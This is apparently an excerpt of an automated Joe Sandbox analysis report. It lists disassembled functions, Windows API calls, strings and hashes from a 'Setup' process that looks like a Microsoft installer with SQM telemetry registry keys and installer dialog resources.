                                                                                              • API ID: ParentWindow$ChildDesktopEnumErrorFreeH_prolog3HeapLastLongMessageSendWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1093383602-0
                                                                                              • Opcode ID: 6330122ec530170bcf586867f5a1dec837a904a1d701a80df92dbdb68c47232e
                                                                                              • Instruction ID: aa80370ac0b2201d360a5f9e286a0edf7810b58a1ff9c9f99ff8fd12f788f8de
                                                                                              • Opcode Fuzzy Hash: 6330122ec530170bcf586867f5a1dec837a904a1d701a80df92dbdb68c47232e
                                                                                              • Instruction Fuzzy Hash: 33111870904704DFDB20AFA9C94499EBBF4FF5AB04B10451AE165EB2A1DB71D910CF50
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(6C5F0168,00000000,6C5D1E21,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D1E8E
                                                                                              • ctype.LIBCPMT ref: 6C5D1EA0
                                                                                              • LeaveCriticalSection.KERNEL32(6C5F0168,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D1EC2
                                                                                              • DeleteCriticalSection.KERNEL32(6C5F0168,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D1EC9
                                                                                              • SetLastError.KERNEL32(1000010A,6C5D1E21,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5DF4C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$DeleteEnterErrorLastLeavectype
                                                                                              • String ID:
                                                                                              • API String ID: 1588575130-0
                                                                                              • Opcode ID: 7be7cb3d2f2c5a0fbd908482607af03c6859b182833dc70c78b96ef5c5c61388
                                                                                              • Instruction ID: 4527aa2b6f18e0afcb1404f51a0d5dcdc281482b72db177bf8d0b2efcefe8abe
                                                                                              • Opcode Fuzzy Hash: 7be7cb3d2f2c5a0fbd908482607af03c6859b182833dc70c78b96ef5c5c61388
                                                                                              • Instruction Fuzzy Hash: 5E0192303123509FDF089B25EC04F9B3674AB8632AF8B0009E025C5991C775E4858F5C
                                                                                              APIs
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,6C5F0088,?,00000000), ref: 6C5E3335
                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 6C5E3351
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$ErrorFileLastSystem
                                                                                              • String ID: If-Modified-Since:%s
                                                                                              • API String ID: 2781989572-880471301
                                                                                              • Opcode ID: 155e3dfecf7ce882a05513eeb972c559018a813454088d31fc4cc1655a8f5ddd
                                                                                              • Instruction ID: 4069d88561777c0e4443af403a479e61599dd160589be995cee67bb4a4b30a80
                                                                                              • Opcode Fuzzy Hash: 155e3dfecf7ce882a05513eeb972c559018a813454088d31fc4cc1655a8f5ddd
                                                                                              • Instruction Fuzzy Hash: D951F232A403489BCB04EE59CC88FDBB7B8FB8C304F560599E525DBA60DB30E944CB54
                                                                                              APIs
                                                                                              • LocalFree.KERNEL32(?,?), ref: 6C5DB6DB
                                                                                                • Part of subcall function 6C5D3679: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,6C5D332F,?), ref: 6C5D3683
                                                                                                • Part of subcall function 6C5D3679: OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,6C5D332F,?), ref: 6C5D36B3
                                                                                                • Part of subcall function 6C5D3679: ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 6C5D36D5
                                                                                                • Part of subcall function 6C5D3679: CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,6C5D332F,?), ref: 6C5D36E0
                                                                                                • Part of subcall function 6C5D1967: malloc.MSVCRT(?,6C5F0554), ref: 6C5D1979
                                                                                                • Part of subcall function 6C5D18E5: _vsnwprintf.MSVCRT ref: 6C5D1913
                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,?,00000000), ref: 6C5DB6BD
                                                                                              Strings
                                                                                              • O:%sD:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GA;;;%s), xrefs: 6C5DB686
                                                                                              • O:%sD:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA), xrefs: 6C5DFDB8
                                                                                              • (A;OICI;GA;;;LS), xrefs: 6C5DB6A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConvertDescriptorProcessSecurityString$CloseCurrentFreeHandleLocalOpenToken_vsnwprintfmalloc
                                                                                              • String ID: (A;OICI;GA;;;LS)$O:%sD:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)$O:%sD:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GA;;;%s)
                                                                                              • API String ID: 4054149472-2141982788
                                                                                              • Opcode ID: e6cb98ae33c3581deef4161e0ff838f5fc124da2c0c5de27243d4cccc1f2a8c9
                                                                                              • Instruction ID: 516bdfbb87e859bed0bdfd47ba21aabbb938cd4ac842a3c6f9c20efe70356ff8
                                                                                              • Opcode Fuzzy Hash: e6cb98ae33c3581deef4161e0ff838f5fc124da2c0c5de27243d4cccc1f2a8c9
                                                                                              • Instruction Fuzzy Hash: A7410531502344FBDB05AE5C8C81FAE3BAAAF8134CF224469F420A5E90C731E945CB5C
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63961B35
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00000004,639585F7,00000000,639598A4), ref: 63961B89
                                                                                              • __EH_prolog3.LIBCMT ref: 63961B9C
                                                                                              • _memset.LIBCMT ref: 63961BB9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$ExceptionRaise_memset
                                                                                              • String ID: IDS_IS_REALLY_CANCEL
                                                                                              • API String ID: 1117901877-1805271499
                                                                                              • Opcode ID: e6f021ec39099dbc48cdbc0b6a533bebbf9e7984c7f386928094ab04fb10c870
                                                                                              • Instruction ID: 4950e4dd5441ff98aed2273dc65b70df74028a07e436311ddb6b32b64d7b7e30
                                                                                              • Opcode Fuzzy Hash: e6f021ec39099dbc48cdbc0b6a533bebbf9e7984c7f386928094ab04fb10c870
                                                                                              • Instruction Fuzzy Hash: 5141F1B16017058FEB20DF68C984B4ABBF0FF5AB04F40495DE58A9B691DB70E905CF91
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63953971
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 63953654: __EH_prolog3.LIBCMT ref: 6395365B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: BackButton$CancelButton$FinishButton$NextButton
                                                                                              • API String ID: 431132790-22014311
                                                                                              • Opcode ID: b92179eebabfceb0df2547b4fbd69276663f956c8d577eb578df847e5c91c8dd
                                                                                              • Instruction ID: 6a5dfbf180b64507e916109b6ba2f29e36bd57ce2b6df8e3443f298a62b8adfc
                                                                                              • Opcode Fuzzy Hash: b92179eebabfceb0df2547b4fbd69276663f956c8d577eb578df847e5c91c8dd
                                                                                              • Instruction Fuzzy Hash: 54414BB1901248EFEB01DBE8C984BDEB7BC6F29A18F184199F014E7282C775DA44CB71
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6394F2C5
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394F20C: __EH_prolog3.LIBCMT ref: 6394F213
                                                                                                • Part of subcall function 639683FD: _memcpy_s.LIBCMT ref: 6396844E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$_memcpy_s
                                                                                              • String ID: IDS_IS_BACK$IDS_IS_CANCEL$IDS_IS_FINISH$IDS_IS_NEXT
                                                                                              • API String ID: 1663610674-2063768433
                                                                                              • Opcode ID: edbd8a245f61275ce59c2c2fdd7ba61f846f48b8cf237cdb6dcb1935c791e260
                                                                                              • Instruction ID: 6445b868524587469fd8008b9e967abdacada63ceece93ef68aba7adfd327c4d
                                                                                              • Opcode Fuzzy Hash: edbd8a245f61275ce59c2c2fdd7ba61f846f48b8cf237cdb6dcb1935c791e260
                                                                                              • Instruction Fuzzy Hash: 004184B29012199FDB04CFACC944AAE77F4AF69718F540598F555EB381CB30DA048FA2
                                                                                              APIs
                                                                                              • DisableThreadLibraryCalls.KERNEL32(?,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D19CE
                                                                                              • InterlockedCompareExchange.KERNEL32(6C5F0164,?,00000000), ref: 6C5D1AB1
                                                                                              • _initterm.MSVCRT ref: 6C5D1AF8
                                                                                              • InterlockedExchange.KERNEL32(6C5F0164,00000000), ref: 6C5D1B0E
                                                                                              • InterlockedCompareExchange.KERNEL32(6C5F0164,00000001,00000000), ref: 6C5D1D46
                                                                                              • free.MSVCRT ref: 6C5D1D7A
                                                                                              • InterlockedExchange.KERNEL32(6C5F0164,00000000), ref: 6C5D1D9C
                                                                                              • Sleep.KERNEL32(000003E8,?,00000000,?,?,6C5D1DDB,?,00000001,?,?,?,?,6C5D1C70,0000002C), ref: 6C5E451B
                                                                                              Strings
                                                                                              • Microsoft\Windows\SoftwareQualityMetricsClient, xrefs: 6C5D19AC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExchangeInterlocked$Compare$CallsDisableLibrarySleepThread_inittermfree
                                                                                              • String ID: Microsoft\Windows\SoftwareQualityMetricsClient
                                                                                              • API String ID: 529680579-2483579846
                                                                                              • Opcode ID: 8da0f8aaacb3f5a78abddea76220f9da7658cd12d24a084addf3ebcfde00c3e8
                                                                                              • Instruction ID: 175fa7bfa395d16a5c5646a11f445b3cf0e49197632a060c6c0701a65e75389d
                                                                                              • Opcode Fuzzy Hash: 8da0f8aaacb3f5a78abddea76220f9da7658cd12d24a084addf3ebcfde00c3e8
                                                                                              • Instruction Fuzzy Hash: 853100B220D3C0AFDB01DB699C54E967B75AB4232C71A819FE452CB953E724E802CB5D
                                                                                              APIs
                                                                                              • RegCreateKeyExW.ADVAPI32(00000000,?,00000000,00000000,00000000,-00020005,?,00000000,00000000,80000002,Software\Microsoft\SQMClient\Windows,CabSessionAfterSize,?,?,6C5E6078,80000002), ref: 6C5E78BB
                                                                                              • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?,6C5E6078,80000002,Software\Microsoft\SQMClient\Windows,00000000,CEIPEnable,00000000,80000002,Software\Microsoft\SQMClient\Windows\DisabledSessions), ref: 6C5E78F3
                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,6C5E6078,80000002,Software\Microsoft\SQMClient\Windows,00000000,CEIPEnable,00000000,80000002,Software\Microsoft\SQMClient\Windows\DisabledSessions,80000002,Software\Microsoft\SQMClient\Windows\Users,80000002,Software\Microsoft\SQMClient\Windows\Uploader\PendingUpload,80000002), ref: 6C5E792D
                                                                                              Strings
                                                                                              • CabSessionAfterSize, xrefs: 6C5E7868
                                                                                              • Software\Microsoft\SQMClient\Windows, xrefs: 6C5E7869
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValue
                                                                                              • String ID: CabSessionAfterSize$Software\Microsoft\SQMClient\Windows
                                                                                              • API String ID: 1818849710-2962713777
                                                                                              • Opcode ID: c9954549411998ef8ac64acc3e97a518c719cba69a7859ec64afbb683645be78
                                                                                              • Instruction ID: 20349a79099601c4ef44f4715450bb8da8c440faa8fa62190bf49ea86a921ceb
                                                                                              • Opcode Fuzzy Hash: c9954549411998ef8ac64acc3e97a518c719cba69a7859ec64afbb683645be78
                                                                                              • Instruction Fuzzy Hash: 1931F531641284BBCB159E14DC84F9B3BBAEF8E799F610185F924D79A2D371CC44DBA0
                                                                                              APIs
                                                                                              • LocalAlloc.KERNEL32(?,00000000), ref: 6C5E5E3B
                                                                                              • memcpy.MSVCRT(?,00000000,-0000000E), ref: 6C5E5E66
                                                                                              • TraceEvent.ADVAPI32(?,?,?), ref: 6C5E5E9E
                                                                                              • LocalFree.KERNEL32(00000000), ref: 6C5E5EAD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Local$AllocEventFreeTracememcpy
                                                                                              • String ID: P
                                                                                              • API String ID: 4064889523-3110715001
                                                                                              • Opcode ID: 70bd200aa761484e12ccc65f34ef92857f5d110ab56da3cce708596ac8eb2e83
                                                                                              • Instruction ID: 279bbe9fcf9b49ff054fc81b8d23e6c18e331ead8d30e80bde61e5e68a2beb11
                                                                                              • Opcode Fuzzy Hash: 70bd200aa761484e12ccc65f34ef92857f5d110ab56da3cce708596ac8eb2e83
                                                                                              • Instruction Fuzzy Hash: 1D3169B1D05218DFEB10CFA9CD8078EB7B6FF89318F6480A9E418A7610D330AA44CF51
                                                                                              APIs
                                                                                              Strings
                                                                                              • QueryServiceStatus failed with error: %u, xrefs: 6396749F
                                                                                              • OpenService failed with error: %u, xrefs: 63967438
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$H_prolog3_
                                                                                              • String ID: OpenService failed with error: %u$QueryServiceStatus failed with error: %u
                                                                                              • API String ID: 3339191932-3526490536
                                                                                              APIs
                                                                                              Strings
                                                                                              • Completed, xrefs: 63951348, 6395134D
                                                                                              • Unexpected behavior: AffectedProducts::ComputeAffectedProductsList() method called when computation state is %s, xrefs: 63951351
                                                                                              • NotStarted, xrefs: 6395133E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8H_prolog3Throw
                                                                                              • String ID: Completed$NotStarted$Unexpected behavior: AffectedProducts::ComputeAffectedProductsList() method called when computation state is %s
                                                                                              • API String ID: 3670251406-2979706164
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63967FA8
                                                                                              • FormatMessageW.KERNEL32(00001300,00000000,?,?,?,00000000,00000000,00000008,6394C9AE,?,00000000,?), ref: 63967FDB
                                                                                              • LocalFree.KERNEL32(?,?,?), ref: 63968004
                                                                                                • Part of subcall function 639683CE: __CxxThrowException@8.LIBCMT ref: 639683E2
                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 6396806E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$Exception@8FormatH_prolog3LocalMessageStringThrow
                                                                                              • String ID: HRESULT 0x%8.8x
                                                                                              • API String ID: 3624661282-2887418326
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63961281
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 63961360: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,Action,6397FE10,?,?,?,205ABF9D,Action,?,00000000), ref: 63961395
                                                                                                • Part of subcall function 63961360: GetLastError.KERNEL32(?,?,?,205ABF9D,Action,?,00000000), ref: 639613A5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$DiskErrorFreeLastSpace
                                                                                              • String ID: complete$Action$Disk space check for items being downloaded$Drive:[%s] Bytes Needed:[%I64u] Bytes Available:[%I64u]
                                                                                              • API String ID: 2933164920-3673225344
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395D07A
                                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 6395D130
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              Strings
                                                                                              • IDS_INSTALL_ABORTED_DESCRIPTION_FORMAT_1S, xrefs: 6395D0BF
                                                                                              • IDS_SUCCESS_BLOCKERS_DESCRIPTION_TEXT, xrefs: 6395D0A3
                                                                                              • IDS_INSTALL_WARNING_DESCRIPTION_FORMAT, xrefs: 6395D0F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$ItemText
                                                                                              • String ID: IDS_INSTALL_ABORTED_DESCRIPTION_FORMAT_1S$IDS_INSTALL_WARNING_DESCRIPTION_FORMAT$IDS_SUCCESS_BLOCKERS_DESCRIPTION_TEXT
                                                                                              • API String ID: 2878149499-3033223209
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395CFAC
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • GetDlgItem.USER32(?,00000067), ref: 6395D018
                                                                                                • Part of subcall function 6394E2E1: GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 6394E319
                                                                                                • Part of subcall function 6394E2E1: FlushInstructionCache.KERNEL32(00000000), ref: 6394E320
                                                                                              • SetWindowLongW.USER32(?,000000FC,?), ref: 6395D041
                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 6395D05A
                                                                                              Strings
                                                                                              • IDS_BLOCK_DIALOGS_SYSLINK_TEXT, xrefs: 6395CFB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3Item$CacheCurrentFlushInstructionLongProcessTextWindow
                                                                                              • String ID: IDS_BLOCK_DIALOGS_SYSLINK_TEXT
                                                                                              • API String ID: 2244164258-355004722
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395D2C6
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • SetDlgItemTextW.USER32(?,0000000B,00000000), ref: 6395D2FC
                                                                                              • SetDlgItemTextW.USER32(?,00000008,00000000), ref: 6395D33B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3ItemText
                                                                                              • String ID: IDS_CLOSE$IDS_CONTINUE
                                                                                              • API String ID: 2008326593-3637486705
                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\WPA\ApplianceServer,00000000,00000001,?), ref: 6C5EA972
                                                                                              • RegQueryValueExA.ADVAPI32(?,Installed,00000000,?,?,?), ref: 6C5EA999
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 6C5EA9BB
                                                                                              Strings
                                                                                              Memory Dump Source
